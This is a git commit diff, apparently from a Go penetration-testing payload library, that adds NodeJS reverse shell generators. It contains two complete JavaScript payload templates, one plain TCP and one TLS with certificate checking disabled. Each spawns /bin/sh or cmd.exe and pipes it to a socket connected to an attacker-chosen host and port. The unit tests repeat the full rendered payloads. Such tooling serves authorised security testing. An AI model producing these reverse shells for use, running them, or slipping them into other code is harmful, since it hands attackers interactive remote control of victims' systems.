Add NodeJS reverse shell payloads (#478)

terrorbyte · web-flow · commit 9c124d47f1f0 · 2025-11-14T20:18:24.000Z
diff --git a/payload/reverse/js.go b/payload/reverse/js.go
@@ -0,0 +1,24 @@
+package reverse
+
+import (
+	_ "embed"
+	"fmt"
+)
+
+var (
+
+	//go:embed nodejs/reverse.js
+	NodeJS string
+	//go:embed nodejs/reverse_tls.js
+	SecureNodeJS string
+)
+
+// NodeJS generates a Node compatible reverse shell with OS detection for Windows. It is not minified and utilizes double quotes.
+func (js *JavascriptPayload) NodeJS(lhost string, lport int) string {
+	return fmt.Sprintf(NodeJS, lport, lhost)
+}
+
+// SecureNodeJS generates a Node compatible reverse shell with TLS support with OS detection for Windows. It is not minified and utilizes double quotes.
+func (js *JavascriptPayload) SecureNodeJS(lhost string, lport int) string {
+	return fmt.Sprintf(SecureNodeJS, lport, lhost)
+}
diff --git a/payload/reverse/nodejs/reverse.js b/payload/reverse/nodejs/reverse.js
@@ -0,0 +1,16 @@
+(function(){
+	var net = require('net'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+	var sh = cp.spawn(shell, []);
+	var client = new net.Socket();
+	client.connect(%d, '%s', function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();
diff --git a/payload/reverse/nodejs/reverse_tls.js b/payload/reverse/nodejs/reverse_tls.js
@@ -0,0 +1,18 @@
+(function(){
+	var tls = require('tls'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+
+	sh = cp.spawn(shell, []);
+	var client = new tls.TLSSocket();
+	options = {rejectUnauthorized: false}
+	client.connect(%d, '%s', options, function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();
diff --git a/payload/reverse/reverse.go b/payload/reverse/reverse.go
@@ -27,30 +27,32 @@ type Default interface{}
 
 // Defines the default Bash struct and all associated payload functions.
 type (
-	BashPayload      struct{}
-	GJScriptPayload  struct{}
-	JJSScriptPayload struct{}
-	JavaPayload      struct{}
-	NetcatPayload    struct{}
-	OpenSSLPayload   struct{}
-	PHPPayload       struct{}
-	PythonPayload    struct{}
-	TelnetPayload    struct{}
-	GroovyPayload    struct{}
-	VBSHTTPPayload   struct{}
+	BashPayload       struct{}
+	GJScriptPayload   struct{}
+	JJSScriptPayload  struct{}
+	JavascriptPayload struct{}
+	JavaPayload       struct{}
+	NetcatPayload     struct{}
+	OpenSSLPayload    struct{}
+	PHPPayload        struct{}
+	PythonPayload     struct{}
+	TelnetPayload     struct{}
+	GroovyPayload     struct{}
+	VBSHTTPPayload    struct{}
 )
 
 var (
 	// Example: makes the Bash payloads accessible via `reverse.Bash`.
-	Bash     = &BashPayload{}
-	GJScript = &GJScriptPayload{}
-	JJS      = &JJSScriptPayload{}
-	Java     = &JavaPayload{}
-	Netcat   = &NetcatPayload{}
-	OpenSSL  = &OpenSSLPayload{}
-	PHP      = &PHPPayload{}
-	Python   = &PythonPayload{}
-	Telnet   = &TelnetPayload{}
-	Groovy   = &GroovyPayload{}
-	VBSHTTP  = &VBSHTTPPayload{}
+	Bash       = &BashPayload{}
+	GJScript   = &GJScriptPayload{}
+	JJS        = &JJSScriptPayload{}
+	Java       = &JavaPayload{}
+	Javascript = &JavascriptPayload{}
+	Netcat     = &NetcatPayload{}
+	OpenSSL    = &OpenSSLPayload{}
+	PHP        = &PHPPayload{}
+	Python     = &PythonPayload{}
+	Telnet     = &TelnetPayload{}
+	Groovy     = &GroovyPayload{}
+	VBSHTTP    = &VBSHTTPPayload{}
 )
diff --git a/payload/reverse/reverse_test.go b/payload/reverse/reverse_test.go
@@ -184,6 +184,53 @@ func TestGroovyClassic(t *testing.T) {
 	}
 }
 
+func TestNodeJS(t *testing.T) {
+	payload := reverse.Javascript.NodeJS("127.0.0.3", 1312)
+	expected := `(function(){
+	var net = require('net'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+	var sh = cp.spawn(shell, []);
+	var client = new net.Socket();
+	client.connect(1312, '127.0.0.3', function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();`
+
+	if payload != expected {
+		t.Fatal(payload)
+	}
+
+	payload = reverse.Javascript.SecureNodeJS("127.0.0.4", 1312)
+	expected = `(function(){
+	var tls = require('tls'),
+		cp = require('child_process'),
+		shell = "/bin/sh";
+	if(process.platform == "win32") {
+		shell = "cmd.exe"
+	};
+
+	sh = cp.spawn(shell, []);
+	var client = new tls.TLSSocket();
+	options = {rejectUnauthorized: false}
+	client.connect(1312, '127.0.0.4', options, function(){
+		client.pipe(sh.stdin);
+		sh.stdout.pipe(client);
+		sh.stderr.pipe(client);
+	});
+	return; 
+})();`
+	if payload != expected {
+		t.Fatal(payload)
+	}
+}
+
 func TestPython312(t *testing.T) {
 	payload := reverse.Python.SecurePython312("127.0.0.2", 9000)
 	expected := `import socket
